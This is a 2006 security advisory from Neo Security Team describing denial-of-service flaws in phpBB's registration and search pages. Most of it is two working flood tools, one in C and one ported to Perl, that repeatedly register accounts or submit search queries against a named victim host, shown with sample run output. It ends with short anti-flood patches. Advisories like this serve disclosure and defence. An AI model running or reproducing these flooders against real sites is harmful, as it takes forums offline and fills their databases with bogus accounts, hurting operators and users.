/* -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST]® - Advisory #18 - 03/03/06 -------------------------------------------------------- Program: phpBB Homepage: http://www.phpbb.com Vulnerable Versions: All phpBB versions Risk: High Risk!! Impact: Multiple DoS Vulnerabilities. -==phpBB Multiple DoS Vulnerabilities ==- --------------------------------------------------------- - Description --------------------------------------------------------- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. - Tested --------------------------------------------------------- many forums - Explotation --------------------------------------------------------- profile.php << By registering as many users as you can. The registration has to ve deactived the security code image. search.php << by searching in a way that the db couln't observe it. This vulnerability has discovered in the version 2.0.15 but it works in all versions if the security image code is not activ ated. - Exploit --------------------------------------------------------- [C Source] /* Name: NsT-phpBBDoS Copyright: NeoSecurityteam Author: HaCkZaTaN Date: 19/06/05 Description: xD You must figure out the problem xD root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS [+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+] NeoSecurityTeam [+] Dos has begun....[+] [*] Use: ./NsT-phpBBDoS [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com [+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+] [+] NeoSecurityTeam [+] [+] Dos has begun....[+] ................................. root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created" Let see how many users I have created root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE MACHTYPE=i486-slackware-linux-gnu root@NeoSecurity:/home/hackzatan# */ #include #include #include #include #ifdef WIN32 #include #pragma comment(lib, "ws2_32") #pragma pack(1) #define WIN32_LEAN_AND_MEAN #else #include #include #include #include #include #include #endif #define __USE_GNU #define _XOPEN_SOURCE int Connection(char *, int); void Write_In(int , char *, char *, char *, int); char Use(char *); int main(int argc, char *argv[]) { int sock, x = 0; char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3]; puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+]"); puts("[+] NeoSecurityTeam [+]"); puts("[+] Dos has begun....[+] "); fflush(stdout); if(argc != 4) Use(argv[0]); while(1) { sock = Connection(Host,80); Write_In(sock, Path, Pro_Sea, Host, x); #ifndef WIN32 shutdown(sock, SHUT_WR); close(sock); #else closesocket(sock); WSACleanup(); #endif Pro_Sea = argv[2]; x++; } //I don't think that it will get here =) return 0; } int Connection(char *Host, int Port) { #ifndef WIN32 #define SOCKET int #else int error; WSADATA wsadata; error = WSAStartup(MAKEWORD(2, 2), &wsadata); if (error == SOCKET_ERROR) { perror("Could Not Start Up Winsock! "); return; } #endif SOCKET sockfd; struct sockaddr_in sin; struct in_addr *myaddr; struct hostent *h; if(Port <= 0 || Port > 65535) { puts("[-] Invalid Port Number "); fflush(stdout); exit(-1); } if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket() "); fflush (stdout); exit(-1); } if(isalpha(Host[0])) { if((h = gethostbyname(Host)) == NULL) { perror("gethostbyname() "); fflush (stdout); exit(-1); } } else { myaddr=(struct in_addr*)malloc(sizeof(struct in_addr)); myaddr->s_addr=inet_addr(Host); if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL) { perror("gethostbyaddr() "); fflush (stdout); exit(-1); } } memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(Port); memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length); if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0) { perror("connect() "); exit (-1); } return sockfd; } void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x) { char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ); char NsT[] = "x4Ex65x6Fx53x65x63x75x72x69x74x79x54x65x61x6D"; char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 " "Accept: */* " "Accept-Language: en-us " "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 " "Accept encoding: gzip,deflate " "Keep-Alive: 300 " "Proxy-Connection: keep-alive " "Content-Type: application/x-www-form-urlencoded " "Cache-Control: no-cache " "Pragma: no-cache "; char *Profile = ".net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=spanish&style=4&timezone=1&dateformat=l%2C+d+F+Y%2C+H%3Ai&mode=register&agreed=true&coppa=0&submit=Enviar "; char *Search = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200 "; if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=N1sT__%d&email=N1sT__%d%%40%s%s", x, x, NsT, Profile); else if(strcmp("search.php", Pro_Sea) == 0) { Pro_Sea = "search.php?mode=results"; sprintf(str1, "search_keywords=Nst_%d%s", x, Search); } else { puts("Sorry. Try making the right choice"); exit(-1); } sprintf(str2, "POST %s%s HTTP/1.1 " "Host: %s " "Referer: http://%s/ %s" "Content-Length: %d %s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1); write(sock, str2, strlen(str2)); write(1, ".", 1); fflush(stdout); } char Use(char *program) { fprintf(stderr,"[*] Use: %s ", program); fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com ", program); fflush(stdout); exit(-1); } /* @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ */ /* EOF */ ************************************************************************* [Perl Source] #!/usr/bin/perl ## Name: NsT-phpBBDoS (Perl Version) ## Copyright: Neo Security Team ## Author: HaCkZaTaN ## Ported: g30rg3_x ## Date: 20/06/05 ## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x ## A Simple phpBB Registration And Search DoS Flooder. ## ## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl ## [+] ## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN ## [+] ported to Perl By g30rg3_x ## [+] Neo Security Team ## [+] ## [+] Host |without http://www.| victimshost.com ## [+] Path |example. /phpBB2/ or /| /phpBB2/ ## [+] Flood Type |1=Registration 2=Search| 1 ## [+] .......................................................... ## [+] .......................................................... ## [+] .......................................................... ## [+] .............................................. ## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed ## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created" use IO::Socket; ## Initialized X $x = 0; ## Flood Variables Provided By User print q( NsT-phpBBDoS v0.2 by HaCkZaTaN ported to Perl By g30rg3_x Neo Security Team ); print q(Host |without http://www.| ); $host = ; chop ($host); print q(Path |example. /phpBB2/ or /| ); $pth = ; chop ($pth); print q(Flood Type |1 = Registration, 2 = Search| ); $type = ; chop ($type); ## If Type Is Equals To 1 or Registration if($type == 1){ ## User Loop for 9999 loops (enough for Flood xDDDD) while($x != 9999) { ## Building User in base X $uname = "username=NsT__" . "$x"; ## Building User Mail in base X $umail = "&email=NsT__" . "$x"; ## Final String to Send $postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit"; ## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die " The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $! " unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums print $sock "POST $pth"."profile.php HTTP/1.1 "; print $sock "Host: $host "; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* "; print $sock "Referer: $host "; print $sock "Accept-Language: en-us "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "Accept-Encoding: gzip, deflate "; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 "; print $sock "Connection: Keep-Alive "; print $sock "Cache-Control: no-cache "; print $sock "Content-Length: $lrg "; print $sock "$postit "; close($sock); ## Print a "." for every loop syswrite STDOUT, "."; ## Increment X in One for every Loop $x++; } ## If Type Is Equals To 2 or Search } elsif ($type == 2){ ## User Search Loop for 9999 loops (enough for Flood xDDDD) while($x != 9999) { ## Final Search String to Send $postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; ## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die " The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $! " unless $sock; ## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums print $sock "POST $pth"."search.php?mode=results HTTP/1.1 "; print $sock "Host: $host "; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 "; print $sock "Referer: $host "; print $sock "Accept-Language: en-us "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "Accept-Encoding: gzip, deflate "; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 "; print $sock "Connection: Keep-Alive "; print $sock "Cache-Control: no-cache "; print $sock "Content-Length: $lrg "; print $sock "$postit "; close($sock); ## Print a "." for every loop syswrite STDOUT, "."; ## Increment X in One for every Loop $x++; } }else{ ## STF??? What Do You Type die "Option not Allowed O_o??? "; } - Solutions -------------------------------------------------------- /* Patch by Paisterist. Put this code after the "// Get current date" line */ phpBB2/includes/usercp_register.php -usercp_register.php- ### $flood=time()-120; $query=$db->sql_query("Select user_regdate from " . USERS_TABLE . " where user_regdate>='" . $flood . "' order by user_regdate desc"); if($db->sql_numrows($query)!=0) { $row=$db->sql_fetchrow($query); $error=TRUE; $error_msg="Protección anti flood activada. Por favor espera " . $flood - $row['user_regdate'] . " segundos y manda los datos de vuelta."; } else { -usercp_register.php- =================================== /* Patch by Paisterist. Put this code after "// Define initial vars" */ phpBB2/search.php -search.php- if ($_GET['mode']=="results") { ############ $fp=fopen("time.txt", "r"); $flood=fgets($fp, 1000); if($flood>=time()-5) { message_die(GENERAL_MESSAGE, "Protección anti flood activada. Intenta unos segundos más tarde"); fclose($fp); exit(0); } else { $fp=fopen("time.txt", "w"); fwrite($fp, time()); fclose($fp); } ###### -search.php- - References -------------------------------------------------------- http://www.neosecurityteam.net/index.php?action=advisories&id=18 - Credits ------------------------------------------------- [C Exploit] by HaCkZaTaN [Perl Exploit] by g30rg3_x [Patch] by Paisterist [N]eo [S]ecurity [T]eam [NST]® - http://www.neosecurityteam.net/ Got Questions? http://www.neosecurityteam.net/foro/ irc.fullnetwork.org #nst [NeoSecurity IRC] - Greets -------------------------------------------------------- Daemon21 LINUX erg0t uyx CrashCool Makoki KingMetal r3v3ng4ns T0wn3r All Internal Fear Staff Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!! @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ */ /* EOF */